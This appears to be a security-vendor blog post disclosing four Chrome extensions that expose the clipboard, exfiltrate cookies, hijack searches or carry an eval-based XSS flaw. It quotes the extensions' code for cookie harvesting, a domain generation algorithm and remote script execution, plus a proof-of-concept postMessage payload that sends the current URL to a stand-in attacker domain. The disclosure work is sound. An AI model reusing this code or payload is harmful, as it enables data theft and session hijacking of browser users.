The Google Chrome Web Store is a treasure trove of useful browser extensions to help make our lives easier or more fun when navigating the web.  

When browsing through the store, many extensions may look tempting but hides unexpected functionality that are not apparent to users. While it’s usually nice to get more than expected the extras in some cases are not always what you bargained for.  

Our security research has uncovered several malicious Chrome extensions that compromises user security. These extensions, with a combined user base exceeding 100,000 users, employ tactics ranging from granting clipboard access to untrusted external domains, to using command-and-control (C&C) infrastructure with domain generation algorithms. 

In this blog, we take a closer look at a few extensions exhibiting the typical malicious/deceptive behaviors found in some Chrome extensions to highlight the risks involved when installing them. Even though the official Google Chrome Web Store employs various steps to filter out potentially malicious extensions, some inevitably still make it through the vetting process putting unsuspecting users at risk. 

Example 1: Good Tab - exposes clipboard to remote third party 

Name: Good Tab

Extension ID: glckmpfajbjppappjlnhhlofhdhlcgaj 

Risks: Undisclosed clipboard delegation to remote HTTP content 

Good Tab presents itself as a customizable new tab page with weather, news, and wallpaper features. Its Chrome Web Store description makes no mention of clipboard access or external domains. 

However, under the hood, the extension's new tab page contains an iframe that grants full clipboard permissions to an external domain to enable remote clipboard-read and clipboard-write permissions to a suspicious domain via the allow attribute. 

<!-- index.html -->

<iframe allow="clipboard-read; clipboard-write"

       src="http://api.office123456[.]com/vcx/">

</iframe> 

To make matters worse, the access is allowed via insecure HTTP which could enable interception of data transmitted or other adversary-in-the-middle (AiTM) attack scenarios. The extension fetches a payload from a suspicious domain, that in turn references a separate highly obfuscated JavaScript file that loads Baidu analytics (hm.baidu[.]com) and additional third-party tracking scripts. 

The security implications of these findings are that an attacker could see everything copied to the clipboard or inject content to the clipboard unknown to the user. Examples of where this could be risky is when users attempt to copy/paste sensitive data such as passwords, keys, or tokens for authentication or transactions. It enables the check-and-switch tactic that has long been used by attackers to redirect cryptocurrency transactions by switching destination wallet addresses. 

Example 2: Children Protection - data exfiltration and remote code execution with C&C framework 

Name: Children Protection

Extension ID: giecgobdmgdamgffeoankaipjkdjbfep 

Risks: Remote code execution, C&C infrastructure, cookie/data exfiltration

This extension is marketed as a parental control tool to "protect your children from many malicious websites," which it does by blocking and tracking access to inappropriate sites and content. However, unknown to users, this extension also implements a full C&C framework with capabilities that goes far beyond what is required by any legitimate parental control application.  

We found ample evidence of highly suspect practices, such as the use of anti-analysis techniques like splitting strings into chunks as a rudimentary way to obfuscate code, which leaves questions about what the developers are trying to hide.

What’s worse is that the extension has the ability to harvest cookies from the browser. The cookies are collected together and then later exfiltrated to a remote site. Exfiltration of cookies is highly suspicious behavior which is commonly carried out by attackers to enable session hijacking. 

if (v.selector == cmds.cookies) { 
      var cks = document.createElement('cookies'); 
      document.cookie.split('; ').forEach(function(v, i) { 
          var cki = document.createElement('cookie'); 
          cki.innerText = v; 
          cks.appendChild(cki); 
      }); 
      else = [cks]; 
} 

The extension also uses a domain generation algorithm (DGA) to generate domains for exfiltration. This is used as a fallback mechanism should connections to the primary C&C domain at codon[.]vn/ext/xmshield.json fail. This type of DGA behavior is typically used by malware to provide resilience to their C&C infrastructure. 

var date = new Date(); 
var id = (new Date(date.getFullYear(), date.getMonth(), date.getDate())) 
        .getTime().toString(36); 
urlCfg = 'http://' + `${id}.live/` + id + '.json'; 

The DGA uses the current date with base-36 encoding to generate URLs such as  http://k8n1z40[.]live/k8n1z40.json, with a new domain generated every day.

The extension also includes ad injection functionality to enable it to download and display ads, as a revenue generation stream. 

window.addEventListener("message", function(event) { 
   if (event.data.method == "FR_X2_P") { 
       chrome.runtime.sendMessage({ method: cmds.create_tab, 
           data: { url: data.url, url_ad: data.url_ad, w: data.w, h: data.h } }); 
   } 
});

Perhaps the most egregious functionality is the C&C framework that can be used to execute remote code. 

if (typeof request.code !== 'undefined' && request.code.length > 0) { 
   chrome.tabs.executeScript(request.tabId, { code: request.code }); 
} 
if (typeof request.file !== 'undefined' && request.file.length > 0) { 
   loadContentXHR(request.file, function(contentJS) { 
       chrome.tabs.executeScript(request.tabId, { code: contentJS }); 
   }); 
} 

Through this functionality, the C&C server can push arbitrary JavaScript for execution in any tab. 

Example 3: DPS Websafe - search hijacking 

Name: DPS Websafe

Extension ID: bjoddpbfndnpeohkmpbjfhcppkhgobcg 

Risks: Search hijacking, user tracking, and brand impersonation 

This extension claims to provide "genuine search results without ads" but actually performs search hijacking and user tracking behind the scenes. It also abuses the branding of Adblock Plus, a legitimate ad-blocking app to help gain trust.

For the branding abuse, the extension uses ABP's icon, the developers even cheekily admit to it in the code comments. 

/* DPS Websafe is a bifurcation of the Adblock Plus extension 
* for blocking advertisements on the web. 
*/ 

However, the real action comes from configuration changes made by the extension that changes the default search engine to one controlled by the developer. This could enable searches to be sent to malicious servers that could redirect or inject malicious content, as well as enable revenue generation for the developer. 

"chrome_settings_overrides": { 
  "search_provider": { 
     "is_default": true, 
     "search_url": "http://www.dpswebsafe[.]com/rd/?q={searchTerms}", 
     "suggest_url": "http://www.dpswebsafe[.]com/rd/?q={searchTerms}&type=list" 
  } 
} 

It also carries out user tracking by sending tracking information to a remote site without a user’s knowledge. 

var extupdateurl = "http://trk.entiretrack[.]com/trackerwcfsrv/tracker.svc/trackUpdate/?q="; 
extupdateurl = extupdateurl + encodeURIComponent("pxl=XTD5316_XTD5199_RUNT..."); 
$.get(extupdateurl, function (data) { 
   console.log("update tracking fired..", extupdateurl); 
}); 

Example 4: Stock Informer - XSS vulnerability 

Name: Stock Informer

Extension ID: beifiidafjobphnbhbbgmgnndjolfcho 

Risks: Exploitable XSS vulnerability, and search hijacking 

Our final example, Stock Informer is stated as a stock market information extension for "Markets & Currencies Information, links” but the extension contains two distinct security risks. 

The most severe issue is a cross-site-scripting (XSS) vulnerability, tracked as CVE-2020-28707 (CVSS score: 6.1) in the Stockdio Historical Chart plugin prior to version 2.8.1, that could enable a remote attacker to execute JavaScript code in the browser. This flaw arises due to inadequate checks on the content sent to an eval() statement within the plugin. 

if (typeof(stockdio_events) == "undefined") { 
  stockdio_events = true; 
  var stockdio_eventMethod = window.addEventListener ? "addEventListener" : "attachEvent"; 
  var stockdio_eventer = window[stockdio_eventMethod]; 
  var stockdio_messageEvent = stockdio_eventMethod == "attachEvent" ? "onmessage" : "message"; 
  stockdio_eventer(stockdio_messageEvent, function (e) { 
     if (typeof(e.data) != "undefined" && typeof(e.data.method) != "undefined") { 
        eval(e.data.method);  // CRITICAL: No origin check! 
     } 
  },false); 
} 

An attacker could exploit the vulnerability by planting an exploit on a website that the victim visits. For example, the following code leaks the current URL of the browser to the attacker via URL parameters. 

// From any website - leak current URL to attacker: 
window.postMessage({ 
   method: "fetch('https://[ATTACKER DOMAIN]/leak?url='+encodeURIComponent(location.href))" 
}, "*"); 

The scope of what potentially be achieved depends on the extension's granted permissions, attackers may also be able to reach Chrome extension APIs like chrome.storage. At minimum, this enables arbitrary script execution in the new tab context, which can be used for tracking, redirects, or data theft from pages the user loads into that tab.

We don’t believe that it is an intentional outcome desired by the developers, instead it is most likely due to use of outdated vulnerable components, which once again highlights the potential pitfalls posed by the software supply chain.

While the XSS flaw may be accidental, its search hijacking functionality is not. The extension's new tab page includes a search form that redirects to a monetization service that earns revenue for the developer identified by the affiliate ID contained in the form fields. 

Conclusions 

While browser extensions can provide a wide range of handy tools to help us achieve more online, much care needs to be taken when choosing to install them, even when installing from trusted sources. 

From our brief research into Chrome Extensions available on the Chrome Web Store, presence of unwanted or undocumented functionality that can put users at risk is an ever-present danger. 

These dangers span the broad spectrum from relatively low risk activities such as undisclosed monetization like displaying ads, to leaking of browsing activities, to hijacking searches/sessions, and even remote code execution.  

We have reported these extensions to Google and recommend their immediate removal from the Chrome Web Store. If any of these extensions are installed, you should uninstall them immediately and use a trusted security solution such as Symantec Endpoint Security to check for signs of compromise and take further actions as necessary. 

Users are advised to practice caution when choosing which extensions to install. Always install from a reputable source, check the developer’s profile and website to see if the extension comes from a trustworthy organization, and check the reviews and ratings to look for warning signs. 

Use of a browser protection solution such as Symantec Browser Protection can also help to block malicious activity associated from web-borne threats including those by malicious extensions. 

Indicators of Compromise